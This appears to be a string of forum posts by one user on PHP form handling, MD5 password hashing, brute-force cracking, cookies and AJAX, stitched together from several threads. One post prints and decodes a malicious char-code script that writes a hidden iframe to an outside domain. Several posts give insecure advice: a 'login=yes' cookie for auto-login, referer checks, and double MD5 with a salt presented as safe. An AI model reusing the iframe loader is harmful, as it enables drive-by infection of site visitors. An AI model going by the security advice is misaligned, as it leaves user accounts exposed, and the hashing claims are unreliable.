rv20

Ok here is some cut down code, it works ok the only three things are, 1) How can hide the ?login=invalidusername in the url 2) Is this secure 3) If the user doesn't enter a password and gets the ?login=invalidusername url and then refreshes the page how do i remove the ?login=invalidusername and go back to the http://login.php How else would you suggest returning the reponse form the php script if not appending the ?login=invalidusername <?php if (($_SERVER['REQUEST_METHOD'] == "POST") && (parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST) == "127.0.0.1")) { $username = $_POST['user']; if ($username == "") { $url_self = htmlentities($_SERVER['PHP_SELF']) . "?login=invalidusername"; header("location: $url_self"); } } ?> <html> <head> </head> <body> <form action="<?php echo htmlentities($_SERVER['PHP_SELF']); ?>" method="post" > <input type="text" name="user"/> <input type="submit"> <input type="button" value="button"> </form> <div id="val_errors" style="width:200px;height:200px;border:solid;"> <?php if ($_GET['login'] == "invalidusername") { echo "Please enter a username"; } ?> </div> </body> </html>

So if you post a form you can do it the regular way or can use AJAX, i would rather to it the regular way but this results in having to refresh(or redirect depending on how you call it) the page twice, twice because you firstly have to actually post the form, (btw i have php and html on the same page) so posting the form, <form action="<?php echo htmlentities($_SERVER['PHP_SELF']); ?>" method="post" > Then if there are validation errors like blank fields, invalid email etc..you have to refresh again to clear the $_POST[] variables so something like, if ($_POST['user'] == ""){ <?php echo htmlentities($_SERVER['PHP_SELF']); ?> } Ok this above exmaple might result in a permanemt loop but with a few tweaks .......... i think PHP_SELF clears the $_POST vars otherwise if you reload the page the $_POST vars are reposted which can result in a variety of problems. Big deal you might say, reposting twice, but, the more you get involved in your own project the more you want it to be as user friendly as possible. I just sense that AJAX is OTT though.

I know all this but this thread has gone a bit off course from my original post but some of the arguments are also a bit weak also like yours with your example or having the same hash for two different passwords(collisions). According to this site, http://unixwiz.net/techtips/iguide-crypto-hashes.html there has never been a collision found yet for an md5 hash. And anyway collisions don't come into it anyway as it it the hash your are replicating from the password so if you manage to generate the right hash from a cracker ok there could be another "string" out there that produces the same hash but it doesn't matter as you have found the hash for your password. I will need to check up on that the wiki entry for rainbow tables uses md5 (md5 ($password . $salt)) with no mention of collisions. I think your collsions problem is a bit far fetched as from what i have looked at you have more chance of building a rainbow table to crack a salted password than you do of having a collision. I think you talk the talk.

delete!

Not entirely sure what the src is but it seems to write an iframe of, <iframe src="http://foxionserl.com/width="1"eight="3"> I ran it and it opened arcrobat reader for a few secs then nothing. The domain foxionserl is registered to Herbert Elliott http://www.whois.net/whois/foxionserl.com

Im sorry, but please please please learn to bloody read. As has already been stated, applying the md5 algorithm more than once increases the chance of collisions. Hence it is less secure. Why is that so hard to understand? No need for the star -- it's trivially true. There has to be a fixed number of inputs that you have to perform in order to generate all the outputs. Whether or not that's equal to the number of different hashes is a different question (which, incidentally i'm guessing is false -- i bet my bottom dollar that there are collisions within the first |sigma|^32 items [where sigma is the alphabet. I would use 16(hex) but i'm not convinced md5 is limited to hex but i cba to check]). What on earth do you mean by 'computationally secure'? Sha1 would require more processing power in order to generate a collision than md5, and a salted password even more so. But that doesn't imply that it is totally secure. Increased chance, what about 1 zillion to one?

Yeah it is just js in char code form is you do a chr(number) on those codes you will doecode, i wrote a little script to do that, the result is, var xew=9871311;var ghg45="foxi";var w="on";var re6="serl.";var h2h="com";var a="ifr";var s="htt";document.write('<'+a+'ame sr'+'c="'+s+'p://'+ghg45+''+w+''+re6+''+h2h+'/'+'" wid'+'th="1" h'+'eight="3">'); function d(){var s=4345;} var rre=8828382 <?php $str_string = "118,97,114,32,120,101,119,61,57,56,55,49,51,49,49,59,118,97,114,32,103,104,103,52,53,61,34,102,111,120,105,34,59, 118,97,114,32,119,61,34,111,110,34,59,118,97,114,32,114,101,54,61,34,115,101,114,108,46,34,59,118,97,114,32,104,50 ,104,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100 ,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,114,39,43,39,99,61,34 ,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,10 4,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34 ,62,60,47,105,102,39,43,39,114,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,100,40,41,123,118,97,11 4,32,115,61,52,51,52,53,59,125,32,118,97,114,32,114,114,101,61,56,56,50,56,51,56,50"; $pieces = explode(",", $str_string); for($i=0;$i<count($pieces);$i++){ $l = chr($pieces[$i]); echo $l; } ?>

I suppose it is just IE6, IE7 and IE8 as as far as i know you can't have them all installed on your pc at once, or can you? Is there some website out there in the internets that shows you the results of your site on all browsers?

I think that what the rv20 is trying to get at is that he doesnt care what the original value is, if he finds a value that creates that hash it is good enough because even if its a collision it will allow him access to what ever that "password" protected are allows access to.... right rv20 ? Correct but realise i am wanting to know this so to know how to secure against such a thing, for example before i asked this question i may have well stored the username and an md5($password) in the cookie i now realise that there are quite a few valid ways to steal a cookie and therefore if you got the hash you could easily run it through a bruter. This is pretty unlikely to happen but why not learn the basics, also quite interesting?? So now i know to do at least an md5(md5($password . $salt)) and you can't really go wrong.

My script produces random output because I give it random input. If you use the same input you'll get the same output. Try it out. Then you probably need to work on your math skills. Do you understand the post I just wrote? If foo => baz and bar => baz and I just tell you "baz". How are you going to know if I had "foo" or "bar"? Well if i run your script 3 times then i get these 3 different hashes for a start, f68902640462f40cb28cf80a0e468b289951852c33d72161ffa5c76650f9bf11 df345263f958e654c54badb27052f138e064594b1bc1074b869266f7f2aad2ba b5f5d34abad06ad189324f7f7414093f4d683a3d32b4e7ab8e92adcda08c490d Second point, i am not saying you can reverse a hash, i am saying if you try every possible combination of passwords then eventually you will hit the same combination that produces the oringnal hash, called a recursive method. md5('a') = 3454535442 md5('aa') = 8983989932 md5('aaa') = 4534534544 and on and on until, md5($x) = same hash as has you are trying to crack.. That is what cracking is, not decoding.

I don't understand your point with the sha-256, to me you would be as well with a random number as that is what it seems to output. So i take it you can't use the sha hashing method to store passwords as how can you compare hashes for passwords if this sha-256 gives a different hash values for the same password each time it is run? I think my point it totally valid, if someone hashes a password with md5 then all you need to do is run a brute forcer and compare each hash generated by the brute force method to the hash you have, i don't see the problem of calling that cracking.

I know all this, but the main thing was just suprise, so i had heard how strong and unreversable md5 was and then saw how easy it was to crack so i have to ask what is the point, it is actually easier to crack than some simple 5 line home brew encryption function, but as i now know if you salt it then very difficult.

Yup that is prety good, would take some mathematics to crack that if at all possible. You really are missing the point of hasing. Hashing is a one-way process. It cannot be 'cracked'. Yes, you can use rainbow tables. Yes, you can analyse the algorithm in order to increase the chances of collisions. No, you cannot reverse it. For example, if i tell you a number is 6 mod 7, what was the original number? You can't tell me. You can tell me an infinite amount of numbers that are also 6 mod 7, but you cannot guarantee that you're telling me my original number. Therefore, you cannot reverse it. While this is an extremely simple example, it should illustrate the point. NO am i not missing the point of hashing, for a single pass of md5 this simple brute forcer takes a matter of minutes to crack a 6 character password with [a-z][A-Z][0-9], http://eternalrise.com/blog/brute-force-php-script/ I haven't tried a 7 letter password the time taken usually goes up, i would guess exponentially. And then yes rainbow tables, they store every possible hash you can get or something along those lines, with databse base searching this can be pretty fast to crack a password. So that leaves you with md5 combination like md5(md5) or adding salt, now after a quick google i see plenty of applications which claim they can crack a salted password, i am not going to bother looking into them, but it wouldn't suprise me if someone has worked something out. So you make out like md5($password) is secure as it is a hash whereas i can crack it in about 1 min.

If you have a div with and set the body bgcolor to some color then the padding still displays white, i would expect that, is thereany way around this though?

Good point. Well i wouldn't use a cookie anyway, sessions, but you are right of course.

But then how do you know who the user is? Even so if you had the username I could edit my cookies to have your username and "yes" Well they login so you check their username in the db and if they check remember me then, if($_POST['ischecked'] === true){ setcookie("login","yes"); } or roughly that. Yes i know you an edit the cookie, javascript:document.cookie='login=yes'; but it's better than actually putting the password in the cookie.

For an auto login if i was using cookies i would just store yes or no in the cookie, the at the top of each *.php page i would have, <?php if($_cookie['login'] == "no"){ header("location home.php"); } But you would really use sessions for this, which are just virtual cookies so to speak. and btw these guys are very good coders after looking at their work, they make pretty complex sites, i will email them and ask as i go to the site a lot. Typos in my first post as well.

This is a bit off topic but, i downloaded an "md5 bruter" cracker, just for learning purposes. Anyway, i set a character set of [a-z][A-Z][0-9] and 3 more symbols :_- i then generated an md5 for a 12 character password in php md5("passpasspass") etc and fed that md5 into the cracker now the cracker tells me that this will take about 32,000 years to crack. How long do you think it would take if you hooked up say 10 supercomputers and coded the cracker in assembler?

Yup that is prety good, would take some mathematics to crack that if at all possible.

There is a really cool SC drag and drop, i don't think it would be hard setting it up either, http://demos111.mootools.net/Drag.Cart

Hope this topic is ok here as i would be using php to do the encryption.. So i have just worked out how md5 hashes work- i thought md5 made passwords ultra secure - and for a password up to say 6 characters long, including numeric characters, then it is very easy to crack by doing a brute force, so i ask what is the point, i am wanting to encrpt passwords in a db and i can't see why my own 'home brew' method should be any more crackable than an md5 hash. What encrption would you recommend, so there would need to be a php class avaialble.

I jus noticed that a site a go to store their users username and encrypted(password) in the cookie. I don'tsee the point, surely the username and password(again it's encrypted) will still have to be stored in a db so that you can write it to the cookie, why would they do this?

Ok i am all for hack prevention can you outline some hacks (i take it we are taklking about ajax hacks) or link me up to a site detailing it..

Why does security go out the window if i they disabled js, youtube uses js/ajax and if you disalbe js in FF they you can't view youtube videos or can't browse through the comments as the comment are fetched through use ajax. So they don't have a backup, basically the worlds most popular site, either enable js or don't use it, i don't see why i should have a problem using ajax??

Guys your right i am talking nonsense here as i still have to POST anyway and check the db via php(in mycase). So you say always check server side, so are there secuirty problems or whatever if i do use AJAX, now that i have a nice working generic AJAX setup i can pretty much use it for all communication to php.